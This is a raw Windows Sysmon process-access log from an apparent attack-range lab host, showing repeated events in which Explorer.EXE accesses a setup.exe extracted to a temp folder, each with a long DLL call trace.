13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\A